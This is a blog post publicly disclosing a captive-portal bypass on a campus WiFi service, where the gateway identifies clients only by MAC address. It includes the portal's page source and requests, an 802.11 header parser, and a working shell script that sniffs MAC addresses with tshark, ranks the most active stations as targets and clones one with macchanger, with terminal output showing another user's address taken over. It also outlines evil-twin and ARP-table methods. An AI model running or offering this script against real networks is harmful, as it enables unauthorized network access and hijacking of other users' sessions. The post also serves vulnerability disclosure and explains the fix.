No, it’s not one of everyone’s favorite “Kali Wifi Hacking Tutorial”

Impersonating anyone in my college campus WiFi w/o credentials

Learning to hack stuff takes learning. Yeah, I know, weird right?
There is no “get rich quick” way to become 1337 hacker.
It’s part learning and part mindset. And no, there is no YouTube video for “WiFi hacking”.

If you didn’t switch tabs and search for the term, then you’re either (one) a fool who believes anything and everything some random person on the Internet says, or (two) well aware that those YouTube tutorials are annoying as hell and teach nothing at all.

I get asked about being able to “hack stuff”, like cracking WiFi passwords. Mostly I just go along with them, throwing in some “yeah, it’s easy/tough”(s). Of course: download Cain & Abel and search Google for something like Aircrack-ng. I don’t go into why you should learn networking, network packets, wireless networks, …you know the drill, because I’ve tried many times and, fortunately or unfortunately, have become a little better at guessing. You know what I mean, right?

The Reconnaissance Corner

What we noticed was a subtle change in the login process: it was so seamless now, right? It felt so good.

Under the hood, something else was going on. I had a feeling. I quickly pulled the page source with curl, and the output was quite funny in my opinion.

Blob can be found over https://gist.github.com/0x48piraj

Some code blocks were hilarious:

</style>
<script language="JavaScript">
<!--
function startClock() {
//alert('');
//alert(''.indexOf("Id="));
if('http://10.163.0.1/status' =='https://customer.i-on.in/')
{
location.href='https://customer.i-on.in/';
window.open('http://1.186.63.155/captiveportal/?login=1&mac=B2_Hostel&page=status&link-login-only=http://10.163.0.1/login&link-logout=http://10.163.0.1/logout&uname=&mac=B2_Hostel&interface-name=B2_Hostel', '_blank');
}
else
location.href = 'http://10.163.0.1/status';//'http://1.186.63.155/captiveportal/?login=1&mac=B2_Hostel&page=status&link-login-only=http://10.163.0.1/login&link-logout=http://10.163.0.1/logout&uname=&mac=B2_Hostel&interface-name=B2_Hostel&Reqchk=1';
}
// -->
</script>

See the if condition? It compares two string literals, 'http://10.163.0.1/status' and 'https://customer.i-on.in/', which can never be equal, so the first branch is dead code and the browser is always sent to http://10.163.0.1/status. I know. I’m also remembering those xkcd comics.

Anyway, the query string handed to the captive portal is:

/?login=1&mac=B2_Hostel&page=status&link-login-only=http://10.163.0.1/login&link-logout=http://10.163.0.1/logout&uname=&mac=B2_Hostel&interface-name=B2_Hostel

Clearly something is fishy. The portal passes a mac parameter (twice, and here it carries the interface name B2_Hostel rather than an address) and an empty uname=, so nothing in the URL identifies the client. Whatever the gateway uses to tell clients apart must be something it sees at the link layer, and the parameter name is a strong hint that it is the MAC address.

Let’s grab some HTTP requests:

GET /login HTTP/1.1
Host: 10.163.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Nothing special, a normal trigger request; let’s forward it:

Full log can be found over https://gist.github.com/0x48piraj

Voila!
What we suspected is true: the gateway trusts the client’s MAC address and relies on it, and nothing else, as the client’s identity.

Okay, time to check whether our theory actually works.

Proof of concept #1

Wo0t!

Searching for xkcd jokes. Loading …

Why trusting MAC address for identification is a bad idea …

On a wireless network, the MAC address uniquely identifies each node (laptop, phone, access point, etc.) at the link layer. Every frame carries the MAC addresses of its transmitter and its intended receiver so that it reaches the right station. Those addresses are sent unencrypted: they live in the 802.11 MAC header (OSI layer 2), and WEP, WPA and WPA2 only encrypt the frame body, so the header stays visible to anyone listening on the channel.

But why?
If the addresses were encrypted, every client on the wireless network would have to decrypt every single frame just to find out whether it was addressed to it. That would burn CPU and battery for no real reason, and under WPA2 each station holds its own pairwise key, so it could not decrypt other stations’ unicast frames anyway.

Since the MAC addresses in every frame are always unencrypted, it’s trivial for an attacker to put a card in monitor mode, sniff the channel (without even joining the network), collect the addresses of every station that is talking, and then impersonate one of them. Just as important: a MAC address is not a credential. Nothing proves that the sender owns the address it claims, so a gateway that keys sessions on it is authenticating nothing at all. The fix is to bind the session to something the client actually proves, such as a per-user login behind 802.1X / WPA2-Enterprise, rather than to an address anyone can copy.
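To make the layer-2 point concrete, here is an added example (not code from the original post) that dissects a raw 802.11 data frame header with nothing but POSIX shell. The frame bytes are constructed for the example and every address in them is made up; the frame control word marks it as a station-to-AP data frame with the Protected Frame bit set, and the bytes after the 24-byte header stand in for the CCMP header and ciphertext. Every station address is recovered from the header alone, without any key material.

```shell
#!/bin/sh
# Added example, not from the original post: parse an 802.11 data frame header
# and show that the station addresses are cleartext even when the Protected
# Frame bit is set and the body is WPA2/CCMP-encrypted.
#
# 802.11 MAC header for a data frame (byte offsets from 0):
#   0-1   Frame Control         2-3    Duration/ID
#   4-9   Address 1 (receiver)  10-15  Address 2 (transmitter)
#   16-21 Address 3             22-23  Sequence Control
# With ToDS=1 / FromDS=0 (station -> AP): Addr1 = BSSID, Addr2 = source station,
# Addr3 = final destination.

# CONSTRUCTED frame: every address below is made up for this example.
FC_HEX="0841"             # type=data, subtype=0, ToDS=1, Protected Frame=1
DUR_HEX="2c00"            # duration/ID
ADDR1_HEX="001122334455"  # receiver: the AP's BSSID (constructed)
ADDR2_HEX="aabbccddeeff"  # transmitter: the client station (constructed)
ADDR3_HEX="001122334455"  # destination (constructed)
SEQ_HEX="1001"            # sequence control
CCMP_HEX="0100002000000000"  # CCMP header: PN, KeyID/ExtIV (constructed)
BODY_HEX="deadbeefcafef00d"  # stands in for the encrypted body (constructed)
SAMPLE_FRAME_HEX="$FC_HEX$DUR_HEX$ADDR1_HEX$ADDR2_HEX$ADDR3_HEX$SEQ_HEX$CCMP_HEX$BODY_HEX"

# hex_slice HEX OFFSET LEN: LEN bytes starting at byte OFFSET, as hex digits
hex_slice() {
    printf '%s' "$1" | cut -c"$(( $2 * 2 + 1 ))-$(( ($2 + $3) * 2 ))"
}

# mac_at HEX OFFSET: the 6 bytes at OFFSET as a colon-separated MAC address
mac_at() {
    hex_slice "$1" "$2" 6 | sed 's/../&:/g; s/:$//'
}

# fc_flags HEX: the second Frame Control byte (flags) as a decimal number
fc_flags() {
    printf '%d' "$(( 0x$(hex_slice "$1" 1 1) ))"
}

# frame_type HEX: 0 = management, 1 = control, 2 = data (bits 2-3 of FC byte 0)
frame_type() {
    printf '%d' "$(( ( 0x$(hex_slice "$1" 0 1) >> 2 ) & 3 ))"
}

# protected_bit HEX: 1 if the Protected Frame flag (bit 6 of the flags byte) is set
protected_bit() {
    printf '%d' "$(( ( $(fc_flags "$1") >> 6 ) & 1 ))"
}

# station_mac HEX: Address 2, the transmitting station. This is exactly the
# value a MAC-keyed captive portal trusts, and it is readable without any key.
station_mac() {
    mac_at "$1" 10
}

# describe_frame HEX: what a monitor-mode sniffer learns from the header alone
describe_frame() {
    flags=$(fc_flags "$1")
    printf 'type=%s ToDS=%d FromDS=%d protected=%s\n' \
        "$(frame_type "$1")" $(( flags & 1 )) $(( (flags >> 1) & 1 )) "$(protected_bit "$1")"
    printf 'addr1 (receiver)    = %s\n' "$(mac_at "$1" 4)"
    printf 'addr2 (transmitter) = %s\n' "$(station_mac "$1")"
    printf 'addr3               = %s\n' "$(mac_at "$1" 16)"
    # bytes 24 onward (hex chars 49+) are the CCMP header and ciphertext
    printf 'after header        = %s (opaque without the station key)\n' \
        "$(printf '%s' "$1" | cut -c49-)"
}

describe_frame "$SAMPLE_FRAME_HEX"
```

The same offsets apply to every frame on the channel, which is why one minute of monitor-mode capture yields the address of every active client: the gateway’s “identity” is broadcast in the clear by the very protocol that is supposed to protect the session.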

Looting MAC Addresses

ARP Tables

Once you are on the LAN, your own ARP cache (ip neigh show, or arp -a) already lists the MAC address of every host you have exchanged traffic with, and a ping sweep of the subnet fills it up quickly.

Evil Twin

Stand up a rogue access point broadcasting the campus SSID; every client that probes for or associates with it hands over its MAC address, with no sniffing of the real network required.

Brute-forcing MAC Addresses ?

MM:MM:MM:SS:SS:SS (MM = the vendor’s OUI, SS = the NIC-specific part)

In mathematics and computing, hexadecimal is a positional numeral system with a radix, or base, of 16. It uses sixteen distinct symbols, most often the symbols "0"–"9" to represent values zero to nine, and "A"–"F" to represent values ten to fifteen.

Exhaustively trying every value of m hex digits costs O(16^m) attempts, so the full address space is:

12 digits, 16 possible values in each place: 16^12 = 2^48 = 281,474,976,710,656 ≈ 2.8 × 10^14

Though, the first 6 digits (MM:MM:MM) of a MAC address identify the manufacturer and are called the OUI (Organizationally Unique Identifier). Fix one vendor’s OUI and the search space reduces to:

16^12 → 16^6 = 2^24 = 16,777,216 per OUI

Better, but brute-force? Really? That is still 16.7 million portal requests per OUI you guess, against a gateway that can rate-limit you, and a guess only wins when it lands on an address that happens to be authenticated at that moment.

Packet Sniffing

OR

Use tshark ❤

tshark -i <iface> -T fields -e eth.src

(eth.src is populated when the interface is in managed mode and tshark decodes frames as Ethernet; in monitor mode ask for wlan.sa instead.)

Writing 1337 exploit

To collect MAC addresses: tshark with the -a flag to cap the capture duration (-a duration:60) plus some slick pipelines. To spoof the address: macchanger is the way to go, combined with basic bash sorcery.
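The gist is linked below, but for readers who want the shape of the pipeline, here is an added reconstruction of the two steps just described (the tshark capture from the Packet Sniffing section and the macchanger spoof). This is my own example, not the author’s exploit.sh, and it assumes tshark, macchanger and iproute2 are installed, that it runs as root when given an interface, and that the interface is in managed mode so eth.src is populated. The capture duration is taken from an assumed CAPTURE_SECONDS variable (default 60). With no interface argument it skips the capture and runs the ranking logic over a constructed sample of tshark output, so the filtering can be checked without root.

```shell
#!/bin/sh
# Added example, not the author's gist: (1) harvest source MAC addresses with
# tshark for a fixed duration, (2) clone one of them with macchanger.
# Assumptions: tshark, macchanger, iproute2 installed; run as root; wireless
# interface in managed mode (eth.src populated; in monitor mode use -e wlan.sa).

CAPTURE_SECONDS="${CAPTURE_SECONDS:-60}"   # assumed knob, not from the post

# valid_mac MAC: true if MAC is six colon-separated hex octets
valid_mac() {
    printf '%s' "$1" | grep -Eq '^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$'
}

# rank_macs: read one MAC per line on stdin (tshark -e eth.src output), keep
# only well-formed unicast addresses (broadcast/multicast have the low bit of
# the first octet set, i.e. an odd second hex digit), and print
# "<mac> <frames seen>" most active first. Active stations are the best
# targets: they are authenticated right now and unlikely to go idle mid-session.
rank_macs() {
    tr 'A-F' 'a-f' \
    | grep -E '^([0-9a-f]{2}:){5}[0-9a-f]{2}$' \
    | grep -E '^[0-9a-f][02468ace]:' \
    | sort | uniq -c | sort -rn \
    | awk '{ print $2, $1 }'
}

# capture_macs IFACE SECONDS: sniff for SECONDS, then rank what was seen
capture_macs() {
    tshark -i "$1" -a "duration:$2" -T fields -e eth.src 2>/dev/null | rank_macs
}

# spoof_mac IFACE MAC: the interface must be down while the address changes
spoof_mac() {
    ip link set dev "$1" down
    macchanger -m "$2" "$1"
    ip link set dev "$1" up
}

main() {
    iface="$1"
    echo "Capturing MAC addr(s) on $iface for ~${CAPTURE_SECONDS}s ..."
    capture_macs "$iface" "$CAPTURE_SECONDS"
    printf 'Enter target MAC addr: '
    read -r target
    if ! valid_mac "$target"; then
        echo "not a MAC address: $target" >&2
        return 1
    fi
    spoof_mac "$iface" "$target"
    echo "Spoofed MAC addr; $iface is back up. Reconnect and open the portal's /login page."
}

# CONSTRUCTED sample of tshark output (mixed case, a broadcast and a multicast
# address, duplicates), used only when no interface is given.
SAMPLE_CAPTURE='08:c5:e1:2a:80:fe
FC:AA:B6:4A:1B:A5
fc:aa:b6:4a:1b:a5
ff:ff:ff:ff:ff:ff
01:00:5e:00:00:fb
fc:aa:b6:4a:1b:a5'

if [ $# -gt 0 ]; then
    main "$1"
else
    echo "usage: $0 <wireless-iface>  (no interface given: ranking the constructed sample)" >&2
    printf '%s\n' "$SAMPLE_CAPTURE" | rank_macs
fi
```

Two practical caveats. Ranking by frame count instead of dumping a raw list matters because a station that was only seen once may already be gone, and the gateway will not honour an address that is no longer in its session table. And the clone is noisy: the moment two hosts share an address, the AP and gateway see the same MAC from two places, the victim’s connection stutters, and any controller that alerts on duplicate MACs has a precise record of what happened.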

Exploit script hosted on https://gist.github.com/0x48piraj

./exploit.sh

root@woot:/home/I-ON-Bypass# ./exploit.sh 
Capturing various MAC addr(s) from local network for ~1 minute …
Running as user “root” and group “root”. This could be dangerous.
Capturing on ‘wlp3s0’
3554
00:bb:60:7c:6a:fa
08:c5:e1:2a:80:fe
08:c5:e1:f4:87:bc
0c:9d:92:a3:7b:30
— REDACTED —
fc:01:7c:1c:e9:21
fc:aa:b6:4a:1b:a5
Enter target MAC addr: fc:aa:b6:4a:1b:a5
Current MAC: 80:c5:f2:b6:12:e9 (unknown)
Permanent MAC: 80:c5:f2:b6:12:e9 (unknown)
New MAC: fc:aa:b6:4a:1b:a5 (unknown)
Spoofed MAC addr, switching the network iface up [wlp3s0]
Visit http://ip-addr/login to enjoy free data.

OR

redstar-os@woot:~/home/I-ON-Bypass$ sudo ./exploit.sh 
[sudo] password for redstar-os:
Capturing various MAC addr(s) from local network for ~1 minute …
— REDACTED —

Sorry i-ON for this public disclosure, but you don’t have a bug bounty program, nor do you give any effs to the emails I sent. I hope this blog will put some pressure on you and you’ll fix the vulnerability as soon as possible.

About the Author


Google Code-In C. Winner. GsOCer ‘19. Independent Security Researcher. Have hacked Medium, Mozilla, Opera & many more. Personal Website: https://0x48piraj.com
